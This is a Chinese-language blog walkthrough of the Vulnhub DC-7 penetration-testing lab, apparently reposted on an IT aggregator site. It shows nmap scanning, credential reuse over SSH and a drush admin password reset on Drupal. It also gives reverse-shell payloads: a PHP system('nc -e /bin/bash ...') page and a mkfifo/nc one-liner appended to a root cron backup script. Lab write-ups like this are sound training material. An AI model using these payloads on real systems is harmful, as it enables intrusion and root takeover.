IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> 系统运维 -> Vulnhub靶场渗透测试系列DC-7(跳出框框打开脑洞 drush更改drupal的admin账户密码) -> 正文阅读

[系统运维]Vulnhub靶场渗透测试系列DC-7(跳出框框打开脑洞 drush更改drupal的admin账户密码)

Vulnhub靶场渗透测试系列DC-7(跳出框框打开脑洞 drush更改drupal的admin账户密码)

靶机下载地址:https://www.vulnhub.com/entry/dc-7,356/
将下载好的靶机导入到VMware虚拟机中,设置网络模式为NAT模式,开启靶机虚拟机
在这里插入图片描述
使用nmap进行主机发现的扫描,命令nmap -Pn 192.168.172.1/24
在这里插入图片描述
扫描到靶机IP后再使用nmap扫描靶机的操作系统,开放端口和对应服务等信息,命令nmap -T4 -A -p- 192.168.172.146
在这里插入图片描述
发现靶机开放22端口ssh服务和80端口的http服务
在这里插入图片描述
然后直接在kali机打开浏览器输入地址http://192.168.172.146进行访问
在这里插入图片描述
这里给到一些提示,同时也看到这应该是一个基于Drupal CMS的网页,然后又在搜索框这里试了一下注入啥的,好像没用
在这里插入图片描述
这里有登录框,随便输入试一下,没有什么特别的反应
在这里插入图片描述
暴力破解也没啥用,使用drupal的exp也没用了,网站首页提示我们要跳出框框思考,要开一开脑洞,然后又发现主页多出了一个这个东西
在这里插入图片描述
然后去百度或者Google里面搜索一下,,果然发现惊喜
在这里插入图片描述
发现一个staffdb的源码文件夹,这应该就是DC-7的突破口,然后我们直接点击staffdb查看源码
在这里插入图片描述
有这么多源码文件,所以我们先从比较典型的看起走,先看config.php吧,直接点开查看
在这里插入图片描述
点开就发现了账户名和密码,然后我们使用这个账户名和密码在网页登录处登录,但是登录不了诶
在这里插入图片描述
然后我们尝试一下使用ssh连接靶机试一试,惊奇地发现竟然成功了
在这里插入图片描述
查看一下dc7user目录下有没有什么文件或者目录,发现真有,backups目录和mbox文件
在这里插入图片描述
然后查看mbox文件
在这里插入图片描述
发现在/opt/scripts/目录下存在一个可执行文件backups.sh,并且发现每隔15分钟就会备份一次
在这里插入图片描述
现在进入backups目录查看,存在两个gpg文件
在这里插入图片描述
没什么用,然后又进入/opt/scripts/目录,等等,这里还提示了you have a new mail in /var/mail/dc7user,我们进入/var/mail目录看看
在这里插入图片描述
也是备份文件,没啥用,,然后又回到/opt/scripts目录下,查看文件backups.sh,命令cat backups.sh
在这里插入图片描述
百度了发现drush是专门用来管理drupal站点的shell,可以用来修改admin账户的密码,使用命令drush user-password admin --password='admin,修改admin账户的密码为admin,这里需要回到/var/www/html目录下命令才可以执行成功
在这里插入图片描述
然后到网页处使用账户密码admin和admin进行登录
在这里插入图片描述
登录成功,然后在Content—>Add content–>Basic page下,准备添加PHP代码反弹shell,但发现Drupal 8不支持PHP代码,百度后知道Drupal 8后为了安全,需要将php单独作为一个模块导入
在这里插入图片描述
然后点击Manage,再点击Extend,再点击Install new module
在这里插入图片描述
在这里输入插件地址,插件地址为

https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz

插件地址在这里查看寻找https://www.drupal.org/project/php,这是PHP插件的介绍页,然后点击install进行安装
在这里插入图片描述
安装成功即可
在这里插入图片描述
然后点击【extend】,看到这里多出来一个php filter,勾选上
在这里插入图片描述
然后向下翻,找到并点击install
在这里插入图片描述
先点击【admin】,再点击【view profile】,回到这里
在这里插入图片描述
然后再点击【home】回到主页面
在这里插入图片描述
然后点击【Edit】
在这里插入图片描述
先在这里选择PHP code
在这里插入图片描述
然后在body里面写入测试代码<?php phpinfo(); ?>,点击【save】,可看到代码执行成功
在这里插入图片描述
代码执行成功
在这里插入图片描述
然后修改代码,写入反弹shell的代码,先在kali中使用命令nc -lvvp 1234进行监听
在这里插入图片描述
然后回到网页主页面,点击【Edit】,修改刚才的代码为<?php system('nc -e /bin/bash 192.168.172.131 1234'); ?>,点击【save】
在这里插入图片描述
kali这边已经成功连接
在这里插入图片描述
但是这个shell是非交互式的shell,所以使用命令python -c "import pty; pty.spawn('/bin/bash')",来获取一个交互式的shell
在这里插入图片描述
进入/opt/scripts目录下,在该目录下的backups.sh脚本文件所属组是www-data,所以www-data用户可以对这个脚本文件进行操作,并且这个脚本文件可以定时执行,所以可以用它来反弹shell
在这里插入图片描述
使用命令echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.172.131 2345 >/tmp/f" >> backups.sh将反弹shell的命令写入到backups.sh文件中,当它定时自动执行时即可执行其中的反弹shell语句,即可反弹回shell,大概需要等待15分钟
在这里插入图片描述
反弹成功,且反弹回来的shell即为root权限的shell,跳转到/root目录下可查看theflag.txt文件
在这里插入图片描述

  系统运维 最新文章
配置小型公司网络WLAN基本业务(AC通过三层
如何在交付运维过程中建立风险底线意识,提
快速传输大文件,怎么通过网络传大文件给对
从游戏服务端角度分析移动同步(状态同步)
MySQL使用MyCat实现分库分表
如何用DWDM射频光纤技术实现200公里外的站点
国内顺畅下载k8s.gcr.io的镜像
自动化测试appium
ctfshow ssrf
Linux操作系统学习之实用指令(Centos7/8均
上一篇文章      下一篇文章      查看所有文章
加:2021-12-10 11:27:06  更:2021-12-10 11:27:28 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 -2024/11/16 4:31:19-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码